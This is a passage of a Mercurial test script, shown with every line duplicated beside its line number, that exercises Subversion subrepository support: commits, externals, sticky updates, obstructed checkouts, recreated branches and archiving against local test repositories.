11 > egrep -v 'Committing|Transmitting|Updating|(^$)' || true
12 > }
12 > }
13
13
14 create subversion repo
14 create subversion repo
15
15
16 $ WCROOT="`pwd`/svn-wc"
16 $ WCROOT="`pwd`/svn-wc"
17 $ svnadmin create svn-repo
17 $ svnadmin create svn-repo
18 $ svn co "$SVNREPOURL" svn-wc
18 $ svn co "$SVNREPOURL" svn-wc
19 Checked out revision 0.
19 Checked out revision 0.
20 $ cd svn-wc
20 $ cd svn-wc
21 $ mkdir src
21 $ mkdir src
22 $ echo alpha > src/alpha
22 $ echo alpha > src/alpha
23 $ svn add src
23 $ svn add src
24 A src
24 A src
25 A src/alpha (glob)
25 A src/alpha (glob)
26 $ mkdir externals
26 $ mkdir externals
27 $ echo other > externals/other
27 $ echo other > externals/other
28 $ svn add externals
28 $ svn add externals
29 A externals
29 A externals
30 A externals/other (glob)
30 A externals/other (glob)
31 $ svn ci -qm 'Add alpha'
31 $ svn ci -qm 'Add alpha'
32 $ svn up -q
32 $ svn up -q
33 $ echo "externals -r1 $SVNREPOURL/externals" > extdef
33 $ echo "externals -r1 $SVNREPOURL/externals" > extdef
34 $ svn propset -F extdef svn:externals src
34 $ svn propset -F extdef svn:externals src
35 property 'svn:externals' set on 'src'
35 property 'svn:externals' set on 'src'
36 $ svn ci -qm 'Setting externals'
36 $ svn ci -qm 'Setting externals'
37 $ cd ..
37 $ cd ..
38
38
39 create hg repo
39 create hg repo
40
40
41 $ mkdir sub
41 $ mkdir sub
42 $ cd sub
42 $ cd sub
43 $ hg init t
43 $ hg init t
44 $ cd t
44 $ cd t
45
45
46 first revision, no sub
46 first revision, no sub
47
47
48 $ echo a > a
48 $ echo a > a
49 $ hg ci -Am0
49 $ hg ci -Am0
50 adding a
50 adding a
51
51
52 add first svn sub with leading whitespaces
52 add first svn sub with leading whitespaces
53
53
54 $ echo "s = [svn] $SVNREPOURL/src" >> .hgsub
54 $ echo "s = [svn] $SVNREPOURL/src" >> .hgsub
55 $ echo "subdir/s = [svn] $SVNREPOURL/src" >> .hgsub
55 $ echo "subdir/s = [svn] $SVNREPOURL/src" >> .hgsub
56 $ svn co --quiet "$SVNREPOURL"/src s
56 $ svn co --quiet "$SVNREPOURL"/src s
57 $ mkdir subdir
57 $ mkdir subdir
58 $ svn co --quiet "$SVNREPOURL"/src subdir/s
58 $ svn co --quiet "$SVNREPOURL"/src subdir/s
59 $ hg add .hgsub
59 $ hg add .hgsub
60 $ hg ci -m1
60 $ hg ci -m1
61
61
62 make sure we avoid empty commits (issue2445)
62 make sure we avoid empty commits (issue2445)
63
63
64 $ hg sum
64 $ hg sum
65 parent: 1:* tip (glob)
65 parent: 1:* tip (glob)
66 1
66 1
67 branch: default
67 branch: default
68 commit: (clean)
68 commit: (clean)
69 update: (current)
69 update: (current)
70 phases: 2 draft
70 phases: 2 draft
71 $ hg ci -moops
71 $ hg ci -moops
72 nothing changed
72 nothing changed
73 [1]
73 [1]
74
74
75 debugsub
75 debugsub
76
76
77 $ hg debugsub
77 $ hg debugsub
78 path s
78 path s
79 source file://*/svn-repo/src (glob)
79 source file://*/svn-repo/src (glob)
80 revision 2
80 revision 2
81 path subdir/s
81 path subdir/s
82 source file://*/svn-repo/src (glob)
82 source file://*/svn-repo/src (glob)
83 revision 2
83 revision 2
84
84
85 change file in svn and hg, commit
85 change file in svn and hg, commit
86
86
87 $ echo a >> a
87 $ echo a >> a
88 $ echo alpha >> s/alpha
88 $ echo alpha >> s/alpha
89 $ hg sum
89 $ hg sum
90 parent: 1:* tip (glob)
90 parent: 1:* tip (glob)
91 1
91 1
92 branch: default
92 branch: default
93 commit: 1 modified, 1 subrepos
93 commit: 1 modified, 1 subrepos
94 update: (current)
94 update: (current)
95 phases: 2 draft
95 phases: 2 draft
96 $ hg commit --subrepos -m 'Message!' | filter_svn_output
96 $ hg commit --subrepos -m 'Message!' | filter_svn_output
97 committing subrepository s
97 committing subrepository s
98 Sending*s/alpha (glob)
98 Sending*s/alpha (glob)
99 Committed revision 3.
99 Committed revision 3.
100 Fetching external item into '*s/externals'* (glob)
100 Fetching external item into '*s/externals'* (glob)
101 External at revision 1.
101 External at revision 1.
102 At revision 3.
102 At revision 3.
103 $ hg debugsub
103 $ hg debugsub
104 path s
104 path s
105 source file://*/svn-repo/src (glob)
105 source file://*/svn-repo/src (glob)
106 revision 3
106 revision 3
107 path subdir/s
107 path subdir/s
108 source file://*/svn-repo/src (glob)
108 source file://*/svn-repo/src (glob)
109 revision 2
109 revision 2
110
110
111 missing svn file, commit should fail
111 missing svn file, commit should fail
112
112
113 $ rm s/alpha
113 $ rm s/alpha
114 $ hg commit --subrepos -m 'abort on missing file'
114 $ hg commit --subrepos -m 'abort on missing file'
115 committing subrepository s
115 committing subrepository s
116 abort: cannot commit missing svn entries (in subrepo s)
116 abort: cannot commit missing svn entries (in subrepo s)
117 [255]
117 [255]
118 $ svn revert s/alpha > /dev/null
118 $ svn revert s/alpha > /dev/null
119
119
120 add an unrelated revision in svn and update the subrepo to without
120 add an unrelated revision in svn and update the subrepo to without
121 bringing any changes.
121 bringing any changes.
122
122
123 $ svn mkdir "$SVNREPOURL/unrelated" -qm 'create unrelated'
123 $ svn mkdir "$SVNREPOURL/unrelated" -qm 'create unrelated'
124 $ svn up -q s
124 $ svn up -q s
125 $ hg sum
125 $ hg sum
126 parent: 2:* tip (glob)
126 parent: 2:* tip (glob)
127 Message!
127 Message!
128 branch: default
128 branch: default
129 commit: (clean)
129 commit: (clean)
130 update: (current)
130 update: (current)
131 phases: 3 draft
131 phases: 3 draft
132
132
133 $ echo a > s/a
133 $ echo a > s/a
134
134
135 should be empty despite change to s/a
135 should be empty despite change to s/a
136
136
137 $ hg st
137 $ hg st
138
138
139 add a commit from svn
139 add a commit from svn
140
140
141 $ cd "$WCROOT/src"
141 $ cd "$WCROOT/src"
142 $ svn up -q
142 $ svn up -q
143 $ echo xyz >> alpha
143 $ echo xyz >> alpha
144 $ svn propset svn:mime-type 'text/xml' alpha
144 $ svn propset svn:mime-type 'text/xml' alpha
145 property 'svn:mime-type' set on 'alpha'
145 property 'svn:mime-type' set on 'alpha'
146 $ svn ci -qm 'amend a from svn'
146 $ svn ci -qm 'amend a from svn'
147 $ cd ../../sub/t
147 $ cd ../../sub/t
148
148
149 this commit from hg will fail
149 this commit from hg will fail
150
150
151 $ echo zzz >> s/alpha
151 $ echo zzz >> s/alpha
152 $ (hg ci --subrepos -m 'amend alpha from hg' 2>&1; echo "[$?]") | grep -vi 'out of date'
152 $ (hg ci --subrepos -m 'amend alpha from hg' 2>&1; echo "[$?]") | grep -vi 'out of date'
153 committing subrepository s
153 committing subrepository s
154 abort: svn:*Commit failed (details follow): (glob)
154 abort: svn:*Commit failed (details follow): (glob)
155 [255]
155 [255]
156 $ svn revert -q s/alpha
156 $ svn revert -q s/alpha
157
157
158 this commit fails because of meta changes
158 this commit fails because of meta changes
159
159
160 $ svn propset svn:mime-type 'text/html' s/alpha
160 $ svn propset svn:mime-type 'text/html' s/alpha
161 property 'svn:mime-type' set on 's/alpha' (glob)
161 property 'svn:mime-type' set on 's/alpha' (glob)
162 $ (hg ci --subrepos -m 'amend alpha from hg' 2>&1; echo "[$?]") | grep -vi 'out of date'
162 $ (hg ci --subrepos -m 'amend alpha from hg' 2>&1; echo "[$?]") | grep -vi 'out of date'
163 committing subrepository s
163 committing subrepository s
164 abort: svn:*Commit failed (details follow): (glob)
164 abort: svn:*Commit failed (details follow): (glob)
165 [255]
165 [255]
166 $ svn revert -q s/alpha
166 $ svn revert -q s/alpha
167
167
168 this commit fails because of externals changes
168 this commit fails because of externals changes
169
169
170 $ echo zzz > s/externals/other
170 $ echo zzz > s/externals/other
171 $ hg ci --subrepos -m 'amend externals from hg'
171 $ hg ci --subrepos -m 'amend externals from hg'
172 committing subrepository s
172 committing subrepository s
173 abort: cannot commit svn externals (in subrepo s)
173 abort: cannot commit svn externals (in subrepo s)
174 [255]
174 [255]
175 $ hg diff --subrepos -r 1:2 | grep -v diff
175 $ hg diff --subrepos -r 1:2 | grep -v diff
176 --- a/.hgsubstate Thu Jan 01 00:00:00 1970 +0000
176 --- a/.hgsubstate Thu Jan 01 00:00:00 1970 +0000
177 +++ b/.hgsubstate Thu Jan 01 00:00:00 1970 +0000
177 +++ b/.hgsubstate Thu Jan 01 00:00:00 1970 +0000
178 @@ -1,2 +1,2 @@
178 @@ -1,2 +1,2 @@
179 -2 s
179 -2 s
180 +3 s
180 +3 s
181 2 subdir/s
181 2 subdir/s
182 --- a/a Thu Jan 01 00:00:00 1970 +0000
182 --- a/a Thu Jan 01 00:00:00 1970 +0000
183 +++ b/a Thu Jan 01 00:00:00 1970 +0000
183 +++ b/a Thu Jan 01 00:00:00 1970 +0000
184 @@ -1,1 +1,2 @@
184 @@ -1,1 +1,2 @@
185 a
185 a
186 +a
186 +a
187 $ svn revert -q s/externals/other
187 $ svn revert -q s/externals/other
188
188
189 this commit fails because of externals meta changes
189 this commit fails because of externals meta changes
190
190
191 $ svn propset svn:mime-type 'text/html' s/externals/other
191 $ svn propset svn:mime-type 'text/html' s/externals/other
192 property 'svn:mime-type' set on 's/externals/other' (glob)
192 property 'svn:mime-type' set on 's/externals/other' (glob)
193 $ hg ci --subrepos -m 'amend externals from hg'
193 $ hg ci --subrepos -m 'amend externals from hg'
194 committing subrepository s
194 committing subrepository s
195 abort: cannot commit svn externals (in subrepo s)
195 abort: cannot commit svn externals (in subrepo s)
196 [255]
196 [255]
197 $ svn revert -q s/externals/other
197 $ svn revert -q s/externals/other
198
198
199 clone
199 clone
200
200
201 $ cd ..
201 $ cd ..
202 $ hg clone t tc
202 $ hg clone t tc
203 updating to branch default
203 updating to branch default
204 A tc/s/alpha (glob)
204 A tc/s/alpha (glob)
205 U tc/s (glob)
205 U tc/s (glob)
206
206
207 Fetching external item into 'tc/s/externals'* (glob)
207 Fetching external item into 'tc/s/externals'* (glob)
208 A tc/s/externals/other (glob)
208 A tc/s/externals/other (glob)
209 Checked out external at revision 1.
209 Checked out external at revision 1.
210
210
211 Checked out revision 3.
211 Checked out revision 3.
212 A tc/subdir/s/alpha (glob)
212 A tc/subdir/s/alpha (glob)
213 U tc/subdir/s (glob)
213 U tc/subdir/s (glob)
214
214
215 Fetching external item into 'tc/subdir/s/externals'* (glob)
215 Fetching external item into 'tc/subdir/s/externals'* (glob)
216 A tc/subdir/s/externals/other (glob)
216 A tc/subdir/s/externals/other (glob)
217 Checked out external at revision 1.
217 Checked out external at revision 1.
218
218
219 Checked out revision 2.
219 Checked out revision 2.
220 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
220 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
221 $ cd tc
221 $ cd tc
222
222
223 debugsub in clone
223 debugsub in clone
224
224
225 $ hg debugsub
225 $ hg debugsub
226 path s
226 path s
227 source file://*/svn-repo/src (glob)
227 source file://*/svn-repo/src (glob)
228 revision 3
228 revision 3
229 path subdir/s
229 path subdir/s
230 source file://*/svn-repo/src (glob)
230 source file://*/svn-repo/src (glob)
231 revision 2
231 revision 2
232
232
233 verify subrepo is contained within the repo directory
233 verify subrepo is contained within the repo directory
234
234
235 $ $PYTHON -c "import os.path; print os.path.exists('s')"
235 $ $PYTHON -c "import os.path; print os.path.exists('s')"
236 True
236 True
237
237
238 update to nullrev (must delete the subrepo)
238 update to nullrev (must delete the subrepo)
239
239
240 $ hg up null
240 $ hg up null
241 0 files updated, 0 files merged, 3 files removed, 0 files unresolved
241 0 files updated, 0 files merged, 3 files removed, 0 files unresolved
242 $ ls
242 $ ls
243
243
244 Check hg update --clean
244 Check hg update --clean
245 $ cd "$TESTTMP/sub/t"
245 $ cd "$TESTTMP/sub/t"
246 $ cd s
246 $ cd s
247 $ echo c0 > alpha
247 $ echo c0 > alpha
248 $ echo c1 > f1
248 $ echo c1 > f1
249 $ echo c1 > f2
249 $ echo c1 > f2
250 $ svn add f1 -q
250 $ svn add f1 -q
251 $ svn status | sort
251 $ svn status | sort
252
252
253 ? * a (glob)
253 ? * a (glob)
254 ? * f2 (glob)
254 ? * f2 (glob)
255 A * f1 (glob)
255 A * f1 (glob)
256 M * alpha (glob)
256 M * alpha (glob)
257 Performing status on external item at 'externals'* (glob)
257 Performing status on external item at 'externals'* (glob)
258 X * externals (glob)
258 X * externals (glob)
259 $ cd ../..
259 $ cd ../..
260 $ hg -R t update -C
260 $ hg -R t update -C
261
261
262 Fetching external item into 't/s/externals'* (glob)
262 Fetching external item into 't/s/externals'* (glob)
263 Checked out external at revision 1.
263 Checked out external at revision 1.
264
264
265 Checked out revision 3.
265 Checked out revision 3.
266 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
266 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
267 $ cd t/s
267 $ cd t/s
268 $ svn status | sort
268 $ svn status | sort
269
269
270 ? * a (glob)
270 ? * a (glob)
271 ? * f1 (glob)
271 ? * f1 (glob)
272 ? * f2 (glob)
272 ? * f2 (glob)
273 Performing status on external item at 'externals'* (glob)
273 Performing status on external item at 'externals'* (glob)
274 X * externals (glob)
274 X * externals (glob)
275
275
276 Sticky subrepositories, no changes
276 Sticky subrepositories, no changes
277 $ cd "$TESTTMP/sub/t"
277 $ cd "$TESTTMP/sub/t"
278 $ hg id -n
278 $ hg id -n
279 2
279 2
280 $ cd s
280 $ cd s
281 $ svnversion
281 $ svnversion
282 3
282 3
283 $ cd ..
283 $ cd ..
284 $ hg update 1
284 $ hg update 1
285 U *s/alpha (glob)
285 U *s/alpha (glob)
286
286
287 Fetching external item into '*s/externals'* (glob)
287 Fetching external item into '*s/externals'* (glob)
288 Checked out external at revision 1.
288 Checked out external at revision 1.
289
289
290 Checked out revision 2.
290 Checked out revision 2.
291 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
291 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
292 $ hg id -n
292 $ hg id -n
293 1
293 1
294 $ cd s
294 $ cd s
295 $ svnversion
295 $ svnversion
296 2
296 2
297 $ cd ..
297 $ cd ..
298
298
299 Sticky subrepositories, file changes
299 Sticky subrepositories, file changes
300 $ touch s/f1
300 $ touch s/f1
301 $ cd s
301 $ cd s
302 $ svn add f1
302 $ svn add f1
303 A f1
303 A f1
304 $ cd ..
304 $ cd ..
305 $ hg id -n
305 $ hg id -n
306 1+
306 1+
307 $ cd s
307 $ cd s
308 $ svnversion
308 $ svnversion
309 2M
309 2M
310 $ cd ..
310 $ cd ..
311 $ hg update tip
311 $ hg update tip
312 subrepository s diverged (local revision: 2, remote revision: 3)
312 subrepository s diverged (local revision: 2, remote revision: 3)
313 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
313 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
314 subrepository sources for s differ
314 subrepository sources for s differ
315 use (l)ocal source (2) or (r)emote source (3)? l
315 use (l)ocal source (2) or (r)emote source (3)? l
316 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
316 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
317 $ hg id -n
317 $ hg id -n
318 2+
318 2+
319 $ cd s
319 $ cd s
320 $ svnversion
320 $ svnversion
321 2M
321 2M
322 $ cd ..
322 $ cd ..
323 $ hg update --clean tip
323 $ hg update --clean tip
324 U *s/alpha (glob)
324 U *s/alpha (glob)
325
325
326 Fetching external item into '*s/externals'* (glob)
326 Fetching external item into '*s/externals'* (glob)
327 Checked out external at revision 1.
327 Checked out external at revision 1.
328
328
329 Checked out revision 3.
329 Checked out revision 3.
330 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
330 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
331
331
332 Sticky subrepository, revision updates
332 Sticky subrepository, revision updates
333 $ hg id -n
333 $ hg id -n
334 2
334 2
335 $ cd s
335 $ cd s
336 $ svnversion
336 $ svnversion
337 3
337 3
338 $ cd ..
338 $ cd ..
339 $ cd s
339 $ cd s
340 $ svn update -qr 1
340 $ svn update -qr 1
341 $ cd ..
341 $ cd ..
342 $ hg update 1
342 $ hg update 1
343 subrepository s diverged (local revision: 3, remote revision: 2)
343 subrepository s diverged (local revision: 3, remote revision: 2)
344 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
344 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
345 subrepository sources for s differ (in checked out version)
345 subrepository sources for s differ (in checked out version)
346 use (l)ocal source (1) or (r)emote source (2)? l
346 use (l)ocal source (1) or (r)emote source (2)? l
347 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
347 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
348 $ hg id -n
348 $ hg id -n
349 1+
349 1+
350 $ cd s
350 $ cd s
351 $ svnversion
351 $ svnversion
352 1
352 1
353 $ cd ..
353 $ cd ..
354
354
355 Sticky subrepository, file changes and revision updates
355 Sticky subrepository, file changes and revision updates
356 $ touch s/f1
356 $ touch s/f1
357 $ cd s
357 $ cd s
358 $ svn add f1
358 $ svn add f1
359 A f1
359 A f1
360 $ svnversion
360 $ svnversion
361 1M
361 1M
362 $ cd ..
362 $ cd ..
363 $ hg id -n
363 $ hg id -n
364 1+
364 1+
365 $ hg update tip
365 $ hg update tip
366 subrepository s diverged (local revision: 3, remote revision: 3)
366 subrepository s diverged (local revision: 3, remote revision: 3)
367 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
367 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
368 subrepository sources for s differ
368 subrepository sources for s differ
369 use (l)ocal source (1) or (r)emote source (3)? l
369 use (l)ocal source (1) or (r)emote source (3)? l
370 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
370 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
371 $ hg id -n
371 $ hg id -n
372 2+
372 2+
373 $ cd s
373 $ cd s
374 $ svnversion
374 $ svnversion
375 1M
375 1M
376 $ cd ..
376 $ cd ..
377
377
378 Sticky repository, update --clean
378 Sticky repository, update --clean
379 $ hg update --clean tip | grep -v 's[/\]externals[/\]other'
379 $ hg update --clean tip | grep -v 's[/\]externals[/\]other'
380 U *s/alpha (glob)
380 U *s/alpha (glob)
381 U *s (glob)
381 U *s (glob)
382
382
383 Fetching external item into '*s/externals'* (glob)
383 Fetching external item into '*s/externals'* (glob)
384 Checked out external at revision 1.
384 Checked out external at revision 1.
385
385
386 Checked out revision 3.
386 Checked out revision 3.
387 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
387 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
388 $ hg id -n
388 $ hg id -n
389 2
389 2
390 $ cd s
390 $ cd s
391 $ svnversion
391 $ svnversion
392 3
392 3
393 $ cd ..
393 $ cd ..
394
394
395 Test subrepo already at intended revision:
395 Test subrepo already at intended revision:
396 $ cd s
396 $ cd s
397 $ svn update -qr 2
397 $ svn update -qr 2
398 $ cd ..
398 $ cd ..
399 $ hg update 1
399 $ hg update 1
400 subrepository s diverged (local revision: 3, remote revision: 2)
400 subrepository s diverged (local revision: 3, remote revision: 2)
401 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
401 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
402 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
402 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
403 $ hg id -n
403 $ hg id -n
404 1+
404 1+
405 $ cd s
405 $ cd s
406 $ svnversion
406 $ svnversion
407 2
407 2
408 $ cd ..
408 $ cd ..
409
409
410 Test case where subversion would fail to update the subrepo because there
410 Test case where subversion would fail to update the subrepo because there
411 are unknown directories being replaced by tracked ones (happens with rebase).
411 are unknown directories being replaced by tracked ones (happens with rebase).
412
412
413 $ cd "$WCROOT/src"
413 $ cd "$WCROOT/src"
414 $ mkdir dir
414 $ mkdir dir
415 $ echo epsilon.py > dir/epsilon.py
415 $ echo epsilon.py > dir/epsilon.py
416 $ svn add dir
416 $ svn add dir
417 A dir
417 A dir
418 A dir/epsilon.py (glob)
418 A dir/epsilon.py (glob)
419 $ svn ci -qm 'Add dir/epsilon.py'
419 $ svn ci -qm 'Add dir/epsilon.py'
420 $ cd ../..
420 $ cd ../..
421 $ hg init rebaserepo
421 $ hg init rebaserepo
422 $ cd rebaserepo
422 $ cd rebaserepo
423 $ svn co -r5 --quiet "$SVNREPOURL"/src s
423 $ svn co -r5 --quiet "$SVNREPOURL"/src s
424 $ echo "s = [svn] $SVNREPOURL/src" >> .hgsub
424 $ echo "s = [svn] $SVNREPOURL/src" >> .hgsub
425 $ hg add .hgsub
425 $ hg add .hgsub
426 $ hg ci -m addsub
426 $ hg ci -m addsub
427 $ echo a > a
427 $ echo a > a
428 $ hg add .
428 $ hg add .
429 adding a
429 adding a
430 $ hg ci -m adda
430 $ hg ci -m adda
431 $ hg up 0
431 $ hg up 0
432 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
432 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
433 $ svn up -qr6 s
433 $ svn up -qr6 s
434 $ hg ci -m updatesub
434 $ hg ci -m updatesub
435 created new head
435 created new head
436 $ echo pyc > s/dir/epsilon.pyc
436 $ echo pyc > s/dir/epsilon.pyc
437 $ hg up 1
437 $ hg up 1
438 D *s/dir (glob)
438 D *s/dir (glob)
439
439
440 Fetching external item into '*s/externals'* (glob)
440 Fetching external item into '*s/externals'* (glob)
441 Checked out external at revision 1.
441 Checked out external at revision 1.
442
442
443 Checked out revision 5.
443 Checked out revision 5.
444 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
444 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
445 $ hg up -q 2
445 $ hg up -q 2
446
446
447 Modify one of the externals to point to a different path so we can
447 Modify one of the externals to point to a different path so we can
448 test having obstructions when switching branches on checkout:
448 test having obstructions when switching branches on checkout:
449 $ hg checkout tip
449 $ hg checkout tip
450 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
450 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
451 $ echo "obstruct = [svn] $SVNREPOURL/externals" >> .hgsub
451 $ echo "obstruct = [svn] $SVNREPOURL/externals" >> .hgsub
452 $ svn co -r5 --quiet "$SVNREPOURL"/externals obstruct
452 $ svn co -r5 --quiet "$SVNREPOURL"/externals obstruct
453 $ hg commit -m 'Start making obstructed working copy'
453 $ hg commit -m 'Start making obstructed working copy'
454 $ hg book other
454 $ hg book other
455 $ hg co -r 'p1(tip)'
455 $ hg co -r 'p1(tip)'
456 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
456 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
457 (leaving bookmark other)
457 (leaving bookmark other)
458 $ echo "obstruct = [svn] $SVNREPOURL/src" >> .hgsub
458 $ echo "obstruct = [svn] $SVNREPOURL/src" >> .hgsub
459 $ svn co -r5 --quiet "$SVNREPOURL"/src obstruct
459 $ svn co -r5 --quiet "$SVNREPOURL"/src obstruct
460 $ hg commit -m 'Other branch which will be obstructed'
460 $ hg commit -m 'Other branch which will be obstructed'
461 created new head
461 created new head
462
462
463 Switching back to the head where we have another path mapped to the
463 Switching back to the head where we have another path mapped to the
464 same subrepo should work if the subrepo is clean.
464 same subrepo should work if the subrepo is clean.
465 $ hg co other
465 $ hg co other
466 A *obstruct/other (glob)
466 A *obstruct/other (glob)
467 Checked out revision 1.
467 Checked out revision 1.
468 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
468 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
469 (activating bookmark other)
469 (activating bookmark other)
470
470
471 This is surprising, but is also correct based on the current code:
471 This is surprising, but is also correct based on the current code:
472 $ echo "updating should (maybe) fail" > obstruct/other
472 $ echo "updating should (maybe) fail" > obstruct/other
473 $ hg co tip
473 $ hg co tip
474 abort: uncommitted changes
474 abort: uncommitted changes
475 (commit or update --clean to discard changes)
475 (commit or update --clean to discard changes)
476 [255]
476 [255]
477
477
478 Point to a Subversion branch which has since been deleted and recreated
478 Point to a Subversion branch which has since been deleted and recreated
479 First, create that condition in the repository.
479 First, create that condition in the repository.
480
480
481 $ hg ci --subrepos -m cleanup | filter_svn_output
481 $ hg ci --subrepos -m cleanup | filter_svn_output
482 committing subrepository obstruct
482 committing subrepository obstruct
483 Sending obstruct/other (glob)
483 Sending obstruct/other (glob)
484 Committed revision 7.
484 Committed revision 7.
485 At revision 7.
485 At revision 7.
486 $ svn mkdir -qm "baseline" $SVNREPOURL/trunk
486 $ svn mkdir -qm "baseline" $SVNREPOURL/trunk
487 $ svn copy -qm "initial branch" $SVNREPOURL/trunk $SVNREPOURL/branch
487 $ svn copy -qm "initial branch" $SVNREPOURL/trunk $SVNREPOURL/branch
488 $ svn co --quiet "$SVNREPOURL"/branch tempwc
488 $ svn co --quiet "$SVNREPOURL"/branch tempwc
489 $ cd tempwc
489 $ cd tempwc
490 $ echo "something old" > somethingold
490 $ echo "something old" > somethingold
491 $ svn add somethingold
491 $ svn add somethingold
492 A somethingold
492 A somethingold
493 $ svn ci -qm 'Something old'
493 $ svn ci -qm 'Something old'
494 $ svn rm -qm "remove branch" $SVNREPOURL/branch
494 $ svn rm -qm "remove branch" $SVNREPOURL/branch
495 $ svn copy -qm "recreate branch" $SVNREPOURL/trunk $SVNREPOURL/branch
495 $ svn copy -qm "recreate branch" $SVNREPOURL/trunk $SVNREPOURL/branch
496 $ svn up -q
496 $ svn up -q
497 $ echo "something new" > somethingnew
497 $ echo "something new" > somethingnew
498 $ svn add somethingnew
498 $ svn add somethingnew
499 A somethingnew
499 A somethingnew
500 $ svn ci -qm 'Something new'
500 $ svn ci -qm 'Something new'
501 $ cd ..
501 $ cd ..
502 $ rm -rf tempwc
502 $ rm -rf tempwc
503 $ svn co "$SVNREPOURL/branch"@10 recreated
503 $ svn co "$SVNREPOURL/branch"@10 recreated
504 A recreated/somethingold (glob)
504 A recreated/somethingold (glob)
505 Checked out revision 10.
505 Checked out revision 10.
506 $ echo "recreated = [svn] $SVNREPOURL/branch" >> .hgsub
506 $ echo "recreated = [svn] $SVNREPOURL/branch" >> .hgsub
507 $ hg ci -m addsub
507 $ hg ci -m addsub
508 $ cd recreated
508 $ cd recreated
509 $ svn up -q
509 $ svn up -q
510 $ cd ..
510 $ cd ..
511 $ hg ci -m updatesub
511 $ hg ci -m updatesub
512 $ hg up -r-2
512 $ hg up -r-2
513 D *recreated/somethingnew (glob)
513 D *recreated/somethingnew (glob)
514 A *recreated/somethingold (glob)
514 A *recreated/somethingold (glob)
515 Checked out revision 10.
515 Checked out revision 10.
516 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
516 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
517 (leaving bookmark other)
517 (leaving bookmark other)
518 $ test -f recreated/somethingold
518 $ test -f recreated/somethingold
519
519
520 Test archive
520 Test archive
521
521
522 $ hg archive -S ../archive-all --debug --config progress.debug=true
522 $ hg archive -S ../archive-all --debug --config progress.debug=true
523 archiving: 0/2 files (0.00%)
523 archiving: 0/2 files (0.00%)
524 archiving: .hgsub 1/2 files (50.00%)
524 archiving: .hgsub 1/2 files (50.00%)
525 archiving: .hgsubstate 2/2 files (100.00%)
525 archiving: .hgsubstate 2/2 files (100.00%)
526 archiving (obstruct): 0/1 files (0.00%)
526 archiving (obstruct): 0/1 files (0.00%)
527 archiving (obstruct): 1/1 files (100.00%)
527 archiving (obstruct): 1/1 files (100.00%)
528 archiving (recreated): 0/1 files (0.00%)
528 archiving (recreated): 0/1 files (0.00%)
529 archiving (recreated): 1/1 files (100.00%)
529 archiving (recreated): 1/1 files (100.00%)
530 archiving (s): 0/2 files (0.00%)
530 archiving (s): 0/2 files (0.00%)
531 archiving (s): 1/2 files (50.00%)
531 archiving (s): 1/2 files (50.00%)
532 archiving (s): 2/2 files (100.00%)
532 archiving (s): 2/2 files (100.00%)
533
533
534 $ hg archive -S ../archive-exclude --debug --config progress.debug=true -X **old
534 $ hg archive -S ../archive-exclude --debug --config progress.debug=true -X **old
535 archiving: 0/2 files (0.00%)
535 archiving: 0/2 files (0.00%)
536 archiving: .hgsub 1/2 files (50.00%)
536 archiving: .hgsub 1/2 files (50.00%)
537 archiving: .hgsubstate 2/2 files (100.00%)
537 archiving: .hgsubstate 2/2 files (100.00%)
538 archiving (obstruct): 0/1 files (0.00%)
538 archiving (obstruct): 0/1 files (0.00%)
539 archiving (obstruct): 1/1 files (100.00%)
539 archiving (obstruct): 1/1 files (100.00%)
540 archiving (recreated): 0 files
540 archiving (recreated): 0 files
541 archiving (s): 0/2 files (0.00%)
541 archiving (s): 0/2 files (0.00%)
542 archiving (s): 1/2 files (50.00%)
542 archiving (s): 1/2 files (50.00%)
543 archiving (s): 2/2 files (100.00%)
543 archiving (s): 2/2 files (100.00%)
544 $ find ../archive-exclude | sort
544 $ find ../archive-exclude | sort
545 ../archive-exclude
545 ../archive-exclude
546 ../archive-exclude/.hg_archival.txt
546 ../archive-exclude/.hg_archival.txt
547 ../archive-exclude/.hgsub
547 ../archive-exclude/.hgsub
548 ../archive-exclude/.hgsubstate
548 ../archive-exclude/.hgsubstate
549 ../archive-exclude/obstruct
549 ../archive-exclude/obstruct
550 ../archive-exclude/obstruct/other
550 ../archive-exclude/obstruct/other
551 ../archive-exclude/s
551 ../archive-exclude/s
552 ../archive-exclude/s/alpha
552 ../archive-exclude/s/alpha
553 ../archive-exclude/s/dir
553 ../archive-exclude/s/dir
554 ../archive-exclude/s/dir/epsilon.py
554 ../archive-exclude/s/dir/epsilon.py
555
555
556 Test forgetting files, not implemented in svn subrepo, used to
556 Test forgetting files, not implemented in svn subrepo, used to
557 traceback
557 traceback
558
558
559 #if no-windows
559 #if no-windows
560 $ hg forget 'notafile*'
560 $ hg forget 'notafile*'
